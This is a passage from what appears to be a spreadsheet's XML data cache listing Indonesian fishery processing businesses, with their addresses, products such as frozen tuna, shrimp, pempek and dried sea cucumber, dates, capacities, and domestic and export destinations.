    <s v="Abon Ikan"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat, Kota Malang, Kota Mojokerto, Kota Surabaya, Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="23349"/>
    <x v="839"/>
    <s v="ABI CULINARY"/>
    <s v="Dusun Jarakan RT 23 RW 05, Kel. Karangsoko, Kec. Trenggalek, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat, Kota Malang, Kota Mojokerto, Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="23350"/>
    <x v="840"/>
    <s v="CV. KARYA LAUT"/>
    <s v="Jl. Pelabuhan Perikanan Gabion Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kembung, Sarden, Aso-Aso, Salem, Layang Biru)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Aceh Tenggara, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Pekanbaru, Kota Jambi, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23353"/>
    <x v="841"/>
    <s v="PT. INDOJOY FORTUNA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23354"/>
    <x v="469"/>
    <s v="PT. MUSTIKA MINANUSA AURORA"/>
    <s v="Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anyar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <s v="Japan, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23355"/>
    <x v="469"/>
    <s v="PT. MUSTIKA MINANUSA AURORA"/>
    <s v="Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anyar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="36000"/>
    <m/>
    <s v="Netherlands, United Kingdom"/>
  </r>
  <r>
    <n v="23356"/>
    <x v="469"/>
    <s v="PT. MUSTIKA MINANUSA AURORA"/>
    <s v="Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anyar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Nobashi Beku"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="1800000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23357"/>
    <x v="469"/>
    <s v="PT. MUSTIKA MINANUSA AURORA"/>
    <s v="Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anyar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23358"/>
    <x v="469"/>
    <s v="PT. MUSTIKA MINANUSA AURORA"/>
    <s v="Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anyar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Senangin, Kerapu)"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23359"/>
    <x v="841"/>
    <s v="PT. INDOJOY FORTUNA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23361"/>
    <x v="841"/>
    <s v="PT. INDOJOY FORTUNA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Sebelah, Manyung, Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23362"/>
    <x v="841"/>
    <s v="PT. INDOJOY FORTUNA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23363"/>
    <x v="841"/>
    <s v="PT. INDOJOY FORTUNA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Meka, Gindara, Cakalang, Tenggiri)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="23364"/>
    <x v="841"/>
    <s v="PT. INDOJOY FORTUNA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Tongkol, Lemadang, Marlin, Meka, Gindara, Cakalang, Tenggiri)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="23365"/>
    <x v="842"/>
    <s v="PT. PRIMA MUTIARA PERSADA"/>
    <s v="Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Belut Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23366"/>
    <x v="842"/>
    <s v="PT. PRIMA MUTIARA PERSADA"/>
    <s v="Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sidat Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23367"/>
    <x v="842"/>
    <s v="PT. PRIMA MUTIARA PERSADA"/>
    <s v="Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23368"/>
    <x v="842"/>
    <s v="PT. PRIMA MUTIARA PERSADA"/>
    <s v="Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23369"/>
    <x v="842"/>
    <s v="PT. PRIMA MUTIARA PERSADA"/>
    <s v="Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23370"/>
    <x v="842"/>
    <s v="PT. PRIMA MUTIARA PERSADA"/>
    <s v="Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Siput Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23371"/>
    <x v="842"/>
    <s v="PT. PRIMA MUTIARA PERSADA"/>
    <s v="Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23376"/>
    <x v="843"/>
    <s v="YAMOIS INDO PRIMA"/>
    <s v="Jl. Kemayoran Atas 8 AQ 18-19 RT 03 RW 09, Kel. Cemorokandang, Kec. Kedungkandang, Kota Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Siomay, Tahu Tuna, Bandeng Isi, Galantine) "/>
    <d v="2021-02-05T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Pusat, Kota Semarang, Kota Malang, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23377"/>
    <x v="844"/>
    <s v="CV. SARI MUTIARA ABADI"/>
    <s v="Dusun Krajan RT 02 RW 04, Desa Srigading, Kec. Lawang, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Agar-agar"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="561935"/>
    <s v="Kota Medan, Kabupaten Bogor, Kabupaten Pasuruan, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar"/>
    <s v="Azerbaijan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23378"/>
    <x v="845"/>
    <s v="CV. ETERNAL STARS OCEAN"/>
    <s v="Jl. Udang Blok M Kav No.7 Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Kerapu, Kakap)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23379"/>
    <x v="845"/>
    <s v="CV. ETERNAL STARS OCEAN"/>
    <s v="Jl. Udang Blok M Kav No.7 (Room 1), Kawasan Pelabuhan Perikanan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23380"/>
    <x v="845"/>
    <s v="CV. ETERNAL STARS OCEAN"/>
    <s v="Jl. Udang Blok M Kav No.7 (Room 1), Kawasan Pelabuhan Perikanan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23382"/>
    <x v="845"/>
    <s v="CV. ETERNAL STARS OCEAN"/>
    <s v="Jl. Udang Blok M Kav No.7 Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Salem, Deho)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23383"/>
    <x v="846"/>
    <s v="PEMPEK SYAMIL"/>
    <s v="Jl. KH. Wahid Hasyim Lorong Damai No.488 B, Kel. 7 Ulu, Kec. Seberang Ulu 1, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Pempek Ikan"/>
    <d v="2020-12-28T00:00:00"/>
    <n v="300"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Semarang, Kota Yogyakarta, Kota Surabaya, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23384"/>
    <x v="847"/>
    <s v="PT. LAPPAWALA MANDIRI PERBATASAN"/>
    <s v="Jl. Jamaker RT 05, Kel. Nunukan Timur, Kec. Nunukan, Kabupaten Nunukan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang)"/>
    <d v="2021-03-04T00:00:00"/>
    <n v="720000"/>
    <s v="Kabupaten Berau, Kota Balikpapan, Kota Samarinda, Kabupaten Malinau, Kabupaten Bulungan, Kabupaten Tana Tidung, Kota Tarakan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23385"/>
    <x v="848"/>
    <s v="CV. NAJWA BAHARI"/>
    <s v="Jl. Sabutung Baru 3 No.25, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Katamba, Sebelah, Kerapu, Kaneke, Kakatua)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23386"/>
    <x v="848"/>
    <s v="CV. NAJWA BAHARI"/>
    <s v="Jl. Sabutung Baru 3 No.25, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Barakuda, Lemadang, Layang, Tenggiri, Cakalang)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23387"/>
    <x v="848"/>
    <s v="CV. NAJWA BAHARI"/>
    <s v="Jl. Sabutung Baru 3 No.25, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23388"/>
    <x v="848"/>
    <s v="CV. NAJWA BAHARI"/>
    <s v="Jl. Sabutung Baru 3 No.25, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="1500"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23389"/>
    <x v="849"/>
    <s v="CV, MARVELL JAYA FISHERY"/>
    <s v="Jl, Dermaga Baru No,8 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Mata Goyang, Layur, Kerapu, Jenaha, Bawal, Pepetek, Kakap, Kuro)"/>
    <d v="2020-12-08T00:00:00"/>
    <n v="195000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23390"/>
    <x v="849"/>
    <s v="CV, MARVELL JAYA FISHERY"/>
    <s v="Jl, Dermaga Baru No,8 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Tongkol, Layang, Tenggiri, Cunang, Ekor Kuning)"/>
    <d v="2020-12-08T00:00:00"/>
    <n v="190000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23391"/>
    <x v="849"/>
    <s v="CV, MARVELL JAYA FISHERY"/>
    <s v="Jl, Dermaga Baru No,8 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2020-12-08T00:00:00"/>
    <n v="110000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23392"/>
    <x v="849"/>
    <s v="CV. MARVELL JAYA FISHERY"/>
    <s v="Jl. Dermaga Baru No.8 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-12-08T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23393"/>
    <x v="850"/>
    <s v="PT, YOBEL UTAMA SEAFOOD INDONESIA"/>
    <s v="Jl, Keramat Basirih No,36, Kel, Basirih, Kec, Banjarmasin Barat, Kota Banjarmasin&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Teripang Kering"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23394"/>
    <x v="851"/>
    <s v="CV. BARUNA SINAR ABADI"/>
    <s v="Jl. A. Yani Km 47, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Udang Beku"/>
    <d v="2021-03-01T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Semarang, Kota Surabaya"/>
    <s v="Argentina, Australia, Brazil, China, Denmark, France, Germany, Hong Kong, India, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Netherlands, Oman, Panama, Portugal, Singapore, South Sudan, Taiwan, Province of China, Thailand, Turkey, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="23401"/>
    <x v="588"/>
    <s v="CV. GOLDEN SEAFRESH"/>
    <s v="Jl. Kapten Rahmad Budin Link 14, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Makerel, Lemadang, Marlin, Gindara, Layaran, Layang, Cakalang, Pedang, Tenggiri)"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23402"/>
    <x v="696"/>
    <s v="PT. GALIC BINA MADA"/>
    <s v="Jl. Inspeksi Kalimalang RT 002 RW 001, Kel. Sukadanau, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Karagenan"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="2500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bandung, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23405"/>
    <x v="852"/>
    <s v="UD. ARYANTO"/>
    <s v="Jl. Abu Hanifah No.23, Kel. Tengah Padang, Kec. Teluk Segara, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="3600000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23406"/>
    <x v="852"/>
    <s v="UD. ARYANTO"/>
    <s v="Jl. Abu Hanifah No.23, Kel. Tengah Padang, Kec. Teluk Segara, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Campuran Seafood Beku"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="4000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23407"/>
    <x v="853"/>
    <s v="HIJRIAN FOOD"/>
    <s v="Kp. Leuweunglarangan RT 003 RW 001, Desa Pancawati, Kec. Caringin, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso, Roll, Otak-otak, Tahu Bakso, Siomay) "/>
    <d v="2021-03-12T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Bogor, Kota Bogor"/>
    <m/>
  </r>
  <r>
    <n v="23410"/>
    <x v="854"/>
    <s v="PT. AMARTA CARRAGEENAN INDONESIA"/>
    <s v="Desa Jeruk Purut, Kel. Bulusari, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Karagenan"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="2500"/>
    <m/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="23413"/>
    <x v="855"/>
    <s v="POKLAHSAR SEJAHTERA"/>
    <s v="Kampung Cikujang RT 005 RW 004, Kel. Maruyung, Kec. Pacet, Kabupaten Bandung&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Abon Ikan"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Medan, Kota Palembang, Kota Jakarta Pusat, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Sumedang, Kabupaten Purwakarta, Kabupaten Bandung Barat, Kota Bandung, Kota Cimahi, Kota Tangerang, Kota Tarakan"/>
    <m/>
  </r>
  <r>
    <n v="23414"/>
    <x v="856"/>
    <s v="CV. PESONA MUSI"/>
    <s v="Jl. Kolonel Burlian Lrg. Sukawana No.19 RT 001 RW 001, Kel. Karya Baru, Kec. Alang-alang Lebar, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Pempek Ikan"/>
    <d v="2020-12-28T00:00:00"/>
    <n v="130000000"/>
    <s v="Kota Medan, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Depok, Kota Semarang, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23417"/>
    <x v="857"/>
    <s v="PT, MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Alfonsino, Cardinal)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="15294.6"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23418"/>
    <x v="857"/>
    <s v="PT, MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Alaska Pollock, Teri, Makerel Atlantik, Hokke, Konosirus, Makerel, Makerel Pasifik, Pacific Saury)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="163857.18"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23419"/>
    <x v="857"/>
    <s v="PT. MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="14375"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23420"/>
    <x v="91"/>
    <s v="PT. TOBA SURIMI INDUSTRIES"/>
    <s v="Jl. Pulau Pinang 2 Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="850000"/>
    <m/>
    <s v="Australia, Canada, Hong Kong, Serbia"/>
  </r>
  <r>
    <n v="23421"/>
    <x v="857"/>
    <s v="PT. MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Baby Yari Ika, Hotaru Ika, Cumi-cumi, Surume Ika)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="40791"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23422"/>
    <x v="857"/>
    <s v="PT. MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23423"/>
    <x v="858"/>
    <s v="PT. THT MAJU INDONESIA"/>
    <s v="Kawasan Industri Agroforestry Terpadu (KIAT), Jl. Raya Tlogowungu Lahar, Kel. Regaloh, Kec. Tlogowungu, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23424"/>
    <x v="858"/>
    <s v="PT. THT MAJU INDONESIA"/>
    <s v="Kawasan Industri Agroforestry Terpadu (KIAT), Jl. Raya Tlogowungu Lahar, Kel. Regaloh, Kec. Tlogowungu, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kulit Ikan Pari"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23425"/>
    <x v="858"/>
    <s v="PT. THT MAJU INDONESIA"/>
    <s v="Kawasan Industri Agroforestry Terpadu (KIAT), Jl. Raya Tlogowungu Lahar, Kel. Regaloh, Kec. Tlogowungu, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teripang Kering"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23429"/>
    <x v="859"/>
    <s v="UD. PACIFIK FISH"/>
    <s v="RT 10 RW 02, Kel. Prigi, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Deho, Layang, Cakalang, Tongkol)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="500000"/>
    <s v="Kabupaten Trenggalek, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23430"/>
    <x v="858"/>
